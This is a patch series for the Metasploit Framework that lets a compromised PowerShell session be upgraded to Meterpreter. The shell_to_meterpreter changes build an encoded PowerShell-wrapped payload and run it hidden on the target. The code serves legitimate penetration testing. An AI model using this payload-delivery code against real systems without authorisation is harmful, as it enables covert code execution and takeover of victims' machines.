From 4aae9b8272332da93ac198c6e9f59329b47ce92c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 8 Sep 2015 15:37:42 +0200 Subject: [PATCH 1/4] support upgrading a powershell session to meterpreter --- lib/msf/base/sessions/powershell.rb | 7 +++++++ lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 2 files changed, 9 insertions(+), 2 deletions(-) diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb index 6451af384d..3606745d7b 100644 --- a/lib/msf/base/sessions/powershell.rb +++ b/lib/msf/base/sessions/powershell.rb @@ -27,6 +27,13 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell "powershell" end + # + # Returns the session platform. + # + def platform + "win" + end + # # Returns the session description. # diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 66dbb0af92..1eae4abfdd 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1917,12 +1917,12 @@ class Core session.response_timeout = response_timeout end begin - if session.type == 'shell' + if session.type.include? 'shell' session.init_ui(driver.input, driver.output) session.execute_script('post/multi/manage/shell_to_meterpreter') session.reset_ui else - print_error("Session #{sess_id} is not a command shell session, skipping...") + print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...") next end ensure From 4cbe35e1b2292d24835a6d6cfe20acc025277729 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 23 Sep 2015 22:08:32 -0500 Subject: [PATCH 2/4] specifically use shell or powershell --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 1eae4abfdd..01713edc60 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1917,7 +1917,7 @@ class Core session.response_timeout = response_timeout end begin - if session.type.include? 'shell' + if ['shell', 'powershell'].include?(session.type) session.init_ui(driver.input, driver.output) session.execute_script('post/multi/manage/shell_to_meterpreter') session.reset_ui From 6468eb51b2767fff398fc4bab8a1a3640f0b5b96 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 2 Oct 2015 15:26:42 -0500 Subject: [PATCH 3/4] Do changes to have into account powershell sesions are not cmd sessions --- lib/msf/base/sessions/powershell.rb | 3 +- lib/msf/core/exploit/powershell.rb | 2 +- lib/msf/core/post/common.rb | 7 ++++ .../post/multi/manage/shell_to_meterpreter.rb | 40 ++++++++++++++----- 4 files changed, 40 insertions(+), 12 deletions(-) diff --git a/lib/msf/base/sessions/powershell.rb b/lib/msf/base/sessions/powershell.rb index 3606745d7b..6e0f01d125 100644 --- a/lib/msf/base/sessions/powershell.rb +++ b/lib/msf/base/sessions/powershell.rb @@ -44,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell # # Takes over the shell_command of the parent # - def shell_command(cmd) + def shell_command(cmd, timeout = 1800) # insert random marker strm = Rex::Text.rand_text_alpha(15) endm = Rex::Text.rand_text_alpha(15) @@ -52,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell # Send the shell channel's stdin. shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n") - timeout = 1800 # 30 minute timeout etime = ::Time.now.to_f + timeout buff = "" diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index 89d99fb00e..281d960bd7 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -147,7 +147,7 @@ module Exploit::Powershell # @param ps_code [String] Powershell code # @param payload_arch [String] The payload architecture 'x86'/'x86_64' # @param encoded [Boolean] Indicates whether ps_code is encoded or not - # + #ex # @return [String] Wrapped powershell code def run_hidden_psh(ps_code, payload_arch, encoded) arg_opts = { diff --git a/lib/msf/core/post/common.rb b/lib/msf/core/post/common.rb index 85e3af4d3a..00f2ddfa9e 100644 --- a/lib/msf/core/post/common.rb +++ b/lib/msf/core/post/common.rb @@ -198,6 +198,13 @@ module Msf::Post::Common end process.close + when /powershell/ + if args.nil? || args.empty? + o = session.shell_command("#{cmd}", time_out) + else + o = session.shell_command("#{cmd} #{args}", time_out) + end + o.chomp! if o when /shell/ if args.nil? || args.empty? o = session.shell_command_token("#{cmd}", time_out) diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index d871740401..e115c35829 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post case platform when 'win' - if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS') - vprint_status("Transfer method: Powershell") - psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false } - cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts)) - else - print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL' - vprint_status("Transfer method: VBS [fallback]") - exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) - aborted = transmit_payload(exe) + if session.type == 'powershell' + template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts') + psh_payload = case datastore['Powershell::method'] + when 'net' + Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data) + when 'reflection' + Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data) + when 'old' + Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data) + when 'msil' + fail RuntimeError, 'MSIL Powershell method no longer exists' + else + fail RuntimeError, 'No Powershell method specified' + end + + # prepend_sleep => 1 + psh_payload = 'Start-Sleep -s 1;' << psh_payload + + encoded_psh_payload = encode_script(psh_payload) + cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true)) + else # shell + if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS') + vprint_status("Transfer method: Powershell") + psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false } + cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts)) + else + print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL' + vprint_status("Transfer method: VBS [fallback]") + exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) + aborted = transmit_payload(exe) + end end when 'python' vprint_status("Transfer method: Python") From 953bfe1a818277c1478712de4efb0d661298198d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 2 Oct 2015 15:29:03 -0500 Subject: [PATCH 4/4] Delete typo --- lib/msf/core/exploit/powershell.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index 281d960bd7..94189d5c6f 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -147,7 +147,6 @@ module Exploit::Powershell # @param ps_code [String] Powershell code # @param payload_arch [String] The payload architecture 'x86'/'x86_64' # @param encoded [Boolean] Indicates whether ps_code is encoded or not - #ex # @return [String] Wrapped powershell code def run_hidden_psh(ps_code, payload_arch, encoded) arg_opts = {